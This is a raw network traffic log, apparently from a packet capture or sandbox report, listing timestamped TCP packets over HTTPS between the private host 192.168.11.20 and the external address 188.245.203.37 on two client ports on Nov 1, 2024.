Nov 1, 2024 20:58:26.917743921 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.917912006 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.917974949 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.917999029 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.918329000 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.938262939 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.938319921 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.938410044 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.938570976 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.938626051 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.938642979 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.938818932 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.958455086 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.958512068 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.958746910 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.958801031 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.958832026 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.958950043 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.970870972 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.970927954 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.971124887 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.971126080 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.971126080 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.971191883 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.971443892 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991660118 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.991717100 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.991863012 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991863012 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991863012 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991931915 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991931915 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.991976023 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.992094040 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.992157936 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006155968 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.006215096 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.006351948 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006351948 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006418943 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006418943 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006418943 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.006455898 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.006737947 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.022676945 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.022735119 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.022917986 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.022986889 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.023037910 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.023272038 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041412115 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.041486025 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.041637897 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041637897 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041698933 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.041719913 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041719913 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041806936 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.041868925 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.051987886 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.052058935 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.052165031 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052165031 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052213907 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052215099 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052243948 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.052277088 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052365065 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.052423000 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.064338923 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.064393997 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.064587116 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.064729929 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.064781904 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.065041065 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074465990 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.074526072 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.074642897 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074642897 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074707031 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074707985 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074739933 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.074768066 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.074870110 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.075061083 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.084963083 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.085021973 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.085146904 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.085146904 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.085374117 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.085426092 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.085704088 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.094463110 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.094521046 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.094664097 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.094664097 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.094728947 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.094808102 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.095012903 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.104703903 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.104760885 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.104933023 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.104996920 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.105026960 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.105350971 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.113570929 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.113629103 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.113758087 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.113758087 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.113995075 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.114048004 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.114468098 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.122462988 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.122519970 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.122759104 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.122811079 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.122845888 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.123106956 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.130630970 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.130688906 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.130985022 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.131037951 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.131334066 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.139889002 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.139945984 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.140255928 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.140255928 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.140320063 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.140577078 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.147396088 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.147454977 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.147680998 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.147680998 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.147744894 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.147777081 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.147941113 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.155491114 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.155571938 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.155735016 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.155829906 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.155859947 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.156081915 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.156845093 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.157011986 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.157069921 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.157202959 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.158422947 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.158480883 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.158495903 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.158700943 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.159162045 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.159229994 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.159435034 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.159642935 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.159694910 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.535840034 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.536031008 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.536490917 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.536537886 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:27.538455963 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:27.538511038 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.129086018 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.129144907 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.129187107 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.129272938 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129323006 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129323006 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129354000 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.129405022 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129405975 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129574060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.129637957 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213205099 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.213234901 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.213397980 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213397980 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213422060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213422060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213433981 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.213471889 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.213644981 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331242085 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.331298113 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.331432104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331432104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331432104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331432104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331432104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331504107 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331504107 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331504107 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331505060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331505060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331505060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.331542015 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.331736088 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.412826061 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.412884951 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.413054943 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.413055897 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.413120985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.413120985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.413120985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.413156033 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.413387060 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475363970 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.475414991 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.475601912 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475603104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475603104 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475649118 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475671053 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.475711107 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.475871086 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.521214008 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.521250010 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.521831036 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.521863937 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.521897078 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.522084951 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.736713886 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.736732960 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.736869097 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.736967087 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.736967087 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737035036 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737071037 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737088919 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737117052 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737162113 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737176895 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737178087 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737212896 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737232924 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737232924 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737232924 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737234116 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737277031 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737277031 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737277031 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737327099 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737360954 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737404108 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737437010 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737437963 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737488985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737535954 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737535954 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737536907 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737562895 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737586021 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737586021 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737586975 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737592936 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737652063 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737652063 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737684965 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737704992 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737735987 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737756014 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.737782001 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737782001 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737831116 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737831116 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737966061 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737966061 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737967014 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737967014 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737967014 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.737967014 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738046885 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738121033 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738204956 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738401890 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.738446951 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.738589048 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738589048 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738631964 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738631964 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738660097 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.738682985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738682985 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.738894939 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.772248983 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.772309065 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.772516012 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.772589922 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.772628069 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.772816896 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.806634903 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.806689024 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.806876898 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.807248116 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.807300091 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.807598114 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.841516018 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.841573000 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.841864109 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.841917038 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.841954947 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.842490911 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.872256041 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.872311115 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.872524023 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.872524977 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.872585058 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.872616053 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.872616053 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.872878075 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.895036936 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.895104885 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.895263910 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.895263910 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.895324945 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.895355940 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.895355940 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.895622969 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.916878939 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.916935921 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.917107105 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.917107105 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.917167902 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.917202950 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.917202950 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.917202950 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.917428970 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.927799940 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.927862883 CET	443	58987	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:28.927994967 CET	58987	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:28.927994967 CET	58987	443	192.168.11.20	188.245.203.37
